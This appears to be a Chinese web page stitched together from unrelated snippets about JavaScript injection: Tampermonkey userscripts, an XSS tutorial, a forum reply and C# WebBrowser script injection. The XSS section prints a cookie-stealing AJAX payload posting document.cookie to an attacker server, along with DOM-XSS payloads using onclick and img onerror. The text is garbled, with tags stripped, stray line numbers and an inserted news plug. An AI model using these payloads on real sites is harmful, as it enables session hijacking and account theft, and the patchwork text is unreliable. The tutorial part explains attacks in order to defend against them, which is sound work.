注入javascript,注入灵魂

如何利用tampermonkey向页面注入自定义Javascript

安装好tampermonkey插件后，在发现需要自动交互的网页时，点击浏览器右上方的tampermonkey的按钮你，这样你就可以开始写你的交互逻辑代码了：上面是一个很通用的模板，如果你看不懂的话也许需要去看下UserScripts的格式…… 这里先把 @name  和 @match  改掉，一个是名字，一个是匹配的网址。名字随便取，@match  改为你要写的网站就行了。具体见 。 然后在最下面开始写代码。

比如文初开头的完整代码如下：

需要说明的是，虽然效果很好很赞，但最大的问题是：需要跑UserScripts。所以一般在常去的资源站上用用就好了，没必要把脚本跑到每个网站上，毕竟那是极浪费性能的事儿~

什么是Javascript注入攻击？

就是注册的时候输入的信息是一段Javascript脚本，如果你没有相应的过滤措施的话，这段js脚本就保存到你的数据库里面了，这样一旦你的网页调用这段数据，网页就会执行这段js程序。

获取最新资讯，请到“壹新闻”

什么是js注入?

Javascript注入就是在浏览器地址栏中输入一段js代码，用来改变页面js变量、页面标签的内容。

使用Javascript注入，用户不需要关闭或保存网页就可以改变其内容，这是在浏览器的地址栏上完成的。命令的语法如下：

Javascript:alert(#command#)

什么是Javascript注入及简单的防御方法

很多网站都有私信或者留言板功能。登录用户可以发表评论或者给其他用户(包括管理员)发送私信。一个最简单的模拟表单如下:

form action="sendmessage.php" method="post'"

textarea name="message" /textarea

input type="submit" value="send" /

/form

当用户点击发送时，这条消息会被保存在数据库中指定的数据表中，另一个用户当打开这条消息的时候将看到发送的内容。但是，如果一个恶意攻击者发送的内容包含了一些Javascript代码，这些代码用于偷取敏感的COOKIE信息。当用户打开看到这条消息的时候，恶意的Javascript代码就会得到执行，造成敏感COOKIE信息泄漏。攻击者可以利用获得这些COOKIE信息进行session hijacking会话劫持，直接以合法用户的身份登录其他用户的账户。

恶意攻击者可以在消息框中加入一下Javascript代码:

?

var url = ""; //攻击者控制的服务器

var postStr = "ck=" + document.COOKIE;

var ajax = null;

if(window.XMLHttpRequest())

{

ajax = new XMLHttpRequest();

}

else if(window.ActiveXObject)

{

ajax = new ActiveXObject("Microsoft.XMLHttp");

}

else

{

return;

}

ajax.open("POST", url, true);

ajax.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");

ajax.send(postStr);

ajax.Onreadystatechange= function()

{

if(ajax.readyState == 4 ajax.status == 200)

{

//alert("Done!");

}

}

通过AJAX异步请求，将被攻击者的敏感COOKIE信息发送给了攻击者控制的服务器。攻击者随后即可利用这些COOKIE信息以”合法”用户的身份进行登录操作。

这里首先要理清楚几个重要的问题:

1. COOKIE的作用

COOKIE，有时也用其复数形式COOKIEs，指某些网站为了辨别用户身份、进行session跟踪而储存在用户本地终端上的数据（通常经过加密）。定义于RFC2109（已废弃），最新取代的规范是RFC2965。

也就是说，COOKIE是用户和服务器之间的桥梁。服务器可以使用session来保存用户的身份信息(ID,购物车等)，但是需要用户在访问网页(发送HTTP数据包)的时候附带上相应的COOKIE，通过COOKIE中的特定值来识别sessionID，才能把单独用户和单独的session联系起来。COOKIE是有状态HTTP交互的一种重要机制。

2. 浏览器的同源策略

在进行COOKIE窃取的时候，攻击者偷取的COOKIE是什么，是全部COOKIE，还是当前这个网站的COOKIE？要解决这个问题，我们要先了解一些浏览器的同源策略。

同源策略，它是由Netscape提出的一个著名的安全策略。

现在所有支持Javascript 的浏览器都会使用这个策略。

所谓同源是指，域名，协议，端口相同。

当一个浏览器的两个tab页中分别打开来 百度和谷歌的页面

当浏览器的百度tab页执行一个脚本的时候会检查这个脚本是属于哪个页面的，

即检查是否同源，只有和百度同源的脚本才会被执行。

同源策略(Same Origin Policy)是一种约定，它是浏览器最核心也是最基本的安全功能，如果缺少了同源策略，则浏览器的正常功能可能都会受到影响。可以说web是构建在同源策略的基础之上的，浏览器只是针对同源策略的一种实现。

浏览器的同源策略限制了来自不同源的”document”或脚本，对当前”document”的读取或者设置某些属性。为了不让浏览器的页面行为发生混乱，浏览器提出了”Origin”(源)这以概念，来自不同的Origin的对象无法互相干扰。

因为同源策略的原因，也就导致了我们的XSS Payload(XSS攻击代码)必须在我们希望攻击的同一个域下触发。例如攻击者如果想窃取在下的COOKIE，那就必须在这个域(可以是不同页面，但要保证是同一个域)下的的某一个页面放置XSS代码，可以是存储型，也可以是反射型或DOM Baesd型的。

4. XSS攻击的种类

对XSS的分类没有明确的标准，但业界普遍将XSS攻击分为三类。反射型XSS(non-persistent XSS), 存储型XSS(persistent XSS), DOM Based XSS

4.1 非持久性跨站点脚本攻击

非持久性XSS也称为反射型跨站漏洞。它是最常见的类型的XSS。漏洞产生的原因是攻击者注入的数据反映在响应中。如果你看了我们上面所示的例子,第一个例子是一个非持久的XSS攻击。一个典型的非持久性XSS包含一个带XSS攻击向量的链接(即每次攻击需要用户的点击)。

4.2 持久的跨站点脚本攻击

持久型跨站点脚本也称为存储跨站点脚本。它一般发生在XSS攻击向量(一般指XSS攻击代码)存储在网站数据库，当一个页面被用户打开的时候执行。每当用户打开浏览器,脚本执行。在上面的示例中,第二个例子就展示了一个持久的XSS攻击。持久的XSS相比非持久性XSS攻击危害性更大,因为每当用户打开页面，查看内容时脚本将自动执行。谷歌的orkut曾经就遭受到XSS。

4.3 基于dom的跨站点脚本攻击

基于DOM的XSS有时也称为type0 XSS。当用户能够通过交互修改浏览器页面中的DOM(Document Object Model)并显示在浏览器上时，就有可能产生这种漏洞，从效果上来说它也是反射型XSS。

通过修改页面的DOM节点形成的XSS，称之为DOM Based XSS。

?

1

2

3

4

5

6

7

8

9

10

script

function test()

{

var str = document.getElementById("text").value;

document.getElementById("t").innerHTML = "a href='" + str + "' testLink/a";

}

/script

div id="t"/div

input type="text" id="text" value="" /

input type="button" id="s" value="write" Onclick="test()" /

在这个场景中，代码修改了页面的DOM节点，通过innerHTML把一段用户数据当作HTML写入到页面中，这就造成了DOM Based XSS

' Onclick=alert(/xss/) '

输入后，页面代码就变成了:

a href='' Onclick=alert(/xss/) '' testLink/a

点击这个新生成的链接，脚本将被执行。

实际上，这里还有另外一种利用方式—除了构造一个新事件外，还可以选择闭合掉a标签，并插入一个新的HTML标签:

'img src=# Onerror=alert(/xss2/) /'

页面代码变成了:

a href=''img src=# Onerror=alert(/xss2/) /'' testLink/a

5. XSS漏洞产生的原因

跨站点脚本的主要原因是程序猿对用户的信任。开发人员轻松地认为用户永远不会试图执行什么出格的事情,所以他们创建应用程序,却没有使用任何额外的代码来过滤用户输入以阻止任何恶意活动。另一个原因是,这种攻击有许多变体，用制造出一种行之有效的XSS过滤器是一件比较困难的事情。

但是这只是相对的，对用户输入数据的”编码”和”过滤”在任何时候都是很重要的，我们必须采取一些针对性的手段对其进行防御。

Javascript注入

Javascript是在客户端执行, 不可能产生什么注入的. 只可能通过修改,避开一些验证限制. 简单的例子就是Ichat聊天室. 聊天室限制了发布一些词组. 通过修改Javascript 可以使被限制的词组发送出去. 不过,等我找找看.你提出来这个还是第一次听到过!

如何在WebBrowser控件中注入Javascript脚本

在WebBrowser中注入并执行Javascript代码

更多 0

c#WebBrowserWinForm

WebBrowser控件用来显示网页内容，有时候我们需要在网页中执行一段自定义的Javascript代码。

如下是实现和注释:

//找到head元素

HtmlElement head = webBrowser1.Document.GetElementsByTagName("head")[0];

//创建script标签

HtmlElement scriptEl = webBrowser1.Document.CreateElement("script");

IHTMLScriptElement element = (IHTMLScriptElement)scriptEl.DomElement;

//给script标签加js内容

element.text = "function sayHello() { alert('hello') }";

//将script标签添加到head标签中

head.AppendChild(scriptEl);

//执行js代码

webBrowser1.Document.InvokeScript("sayHello");